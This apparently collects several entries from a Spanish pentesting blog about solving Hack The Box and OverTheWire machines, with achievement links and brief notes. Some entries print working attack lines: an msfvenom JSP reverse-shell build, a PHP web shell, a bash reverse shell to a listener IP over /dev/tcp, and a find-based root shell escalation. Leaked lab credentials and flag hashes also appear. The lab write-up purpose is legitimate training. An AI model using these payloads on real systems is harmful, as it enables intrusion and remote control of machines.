Una máquina cuyo autor ha hecho hincapié en que sea realista, a costa de ser más difícil. Sigo con el formato visor de google docs, por lo que el documento se verá actualizado en tiempo real mientras lo edito.
Máquina activa bastante sencilla, en la que no se utiliza ninguna técnica o herramienta poco común. Lo que más pruebas ha costado es encontrar cómo funcionan los permisos de usuario para la escalada de privilegios. He descartado crackeo de password de root, atacar el docker y extraer credenciales de la web. No descarto que existan otras vulnerabilidades.
Logro: <a href="https://www.hackthebox.com/achievement/machine/1071573/537" target="_blank" rel="noopener">-=_Link_=-</a>
Writeup: Publicaré cuando se retire la máquina. Peticiones de ayuda por comentarios.
ssh bandit5@bandit.labs.overthewire.org -p 2220 find . -type f -readable ! -executable -size 1033c | xargs cat | sed "s/ //g" find . -type f -readable ! -executable -size 1033c | xargs cat | tr " " "" find . -type f -readable ! -executable -size 1033c | xargs cat | xargsEncuentra todos los ficheros, incluso ocultos, desde el actual directorio, que sean de tipo fichero, leibles, no ejecutables, de tamaño 1033 bits (c) y del output muestra el contenido, y de ese contenido sustituye todos (g) los espacios por nada. Tr hace lo mismo de forma más sencilla.
Máquina Linux de dificultad Insane en la que llevaba un tiempo atascado pero que pasado cierto punto me ha parecido dificultad media como mucho. Con seguridad se debe a los avances en las herramientas de pentesting, puesto que esta máquina tiene ya cinco años de vida, y este campo evoluciona rápido.
Logro: https://www.hackthebox.com/achievement/machine/1071573/145
Después de casi un mes de bastante trabajo...
Máquina de Active Directory en la que se pueden usar las herramientas más usadas, como Bloodhound.
Logro: https://www.hackthebox.com/achievement/machine/1071573/212
Writeup: https://docs.google.com/document/d/e/2PACX-1vS0_poxp6JLFHfDfnAfCzFAhMcpT6cBJjvHIhqBfujUAJsPC1r61rA5JYDgNd5Y0svu_6mo4L9lUtbo/pub
(Terminado, pendiente de revisión)
Flag de root entregada y máquina completada usando DirtyPipe (CVE-2022-0847). Es casi imposible romper con fuerza bruta el hash de la contraseña de root así que he buscado otro tipo de exploits y otro tipo de vulnerabilidades. Máquina no diseñada para ser atacada mediante una vulnerabilidad moderna de kernel (bueno, es de suponer que moderna, no se puede saber cuántos años lleva descubierta y explotada), de la que probablemente sean vulnerables gran parte de las máquinas de HTB.
La dejo pendiente de rootear sin usar PwnKit o DirtyPipe, lo que será un proceso largo y meticuloso. Por supuesto tampoco con Metasploit para mantenerme dentro de las reglas OSCP que no permiten usar Big Red Button hack tools.
Results: https://www.hackthebox.com/achievement/machine/1071573/400
Voy a retomar las máquinas de Active Directory.
Return pwned.
Results: <a href="https://www.hackthebox.com/achievement/machine/1071573/401" target="_blank" rel="noopener">Link</a>
Writeup: <a href="https://docs.google.com/document/d/e/2PACX-1vQ9yJWk9DEY_kDNlfRZXaovE6TxZh3ioucwV_yTXsUnQyuszxLouE1SPiIzuEP5TRkhL7X7krLMQcQi/pub" target="_blank" rel="noopener">Link</a>
Pwned: Link
Writeup (OSCP rules): Link
Hay varios métodos de atacar esta máquina. Aunque el más sencillo pasa por escalar privilegios con Metasploit, también se puede buscar un exploit y ejecutarlo, pero la forma más elegante de explotarlo es mediante una vulnerabilidad detectada en el panel web, que tiene un error de configuración con el que se permite la ejecución remota de código mediante parámetros los de las notificaciones. Es un error crítico que no suele verse en entornos reales, pero puede estar ahí. Con este método intenté crear un usuario privilegiado pero algo fallaba por lo que opté por un payload para abrir un shell reverso con privilegios de super usuario. El writeup se centra en esta última forma.
sudo nmap -sSCV -p- --open -n -Pn -vvv --min-rate 5000 -oA allPorts 10.10.10.95
dirsearch -u 10.10.10.95:8080https://book.hack tricks.xyz/network-services-pentesting/pentesting-web/tomcat#msfvenom-reverse-shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.8 LPORT=443 -f war -o revshell.war nc -nvlp 443
Demasiado sencilla incluso para principantes pero un repaso a Tomcat y a msfvenom.
Un reto curioso de reversing que me ha llevado varios días.
Hay que quemarse un poco las pestañas con gdb y ghidra pero ha sido bastante divertido.
El writeup lo publicaré cuando se retire el reto.
Una máquina clasíca de la plataforma Hack the Box que resulta ser un Metasploitable2 algo más “securizado”. Yo ya había hecho Metasploitable2 por lo que las antiguas notas me han sido útiles.
Results: https://www.hackthebox.com/achievement/machine/1071573/1
Unas vacaciones bastante productivas, permitiéndome resolver dos máquinas que llevaba tiempo con ellas, especialmente Updown que llevaba casi 2 meses con ella, y terminar el recorrido de Starting Point con todas las máquinas VIP, cuyo colofón eran Base, Included y Markup, para las que no habrá writeup por que tienen el suyo oficial.
Esto no es un WriteUp. Este post solo contiene notas de utilidad, datos exfiltrados y enlaces de investigación para el pentesting de una máquina de pruebas.
This is not a WriteUp. This post only contains utility notes, exfiltrated data and research links for pentesting a test machine.
10.129.95.184
<?php echo system($_REQUEST['cmd']);?> /bin/bash -c 'bash -i >& /dev/tcp/10.10.15.216/4499 0>&1' cmd=/bin/bash+-c+'bash+-i+>%26+/dev/tcp/10.10.15.216/443+0>%261' $username = "admin"; $password = "thisisagoodpassword";www-data@base:/$
f54846c258f3b4612f78a819573d158e
sudo find . -exec /bin/sh \; -quit
51709519ea18ab37dd6fc58096bea949
Logro: Link

Por motivos laborales he estado bastante inactivo en la publicación de writeups, aunque he continuado haciendo cajas cada cierto tiempo . Du...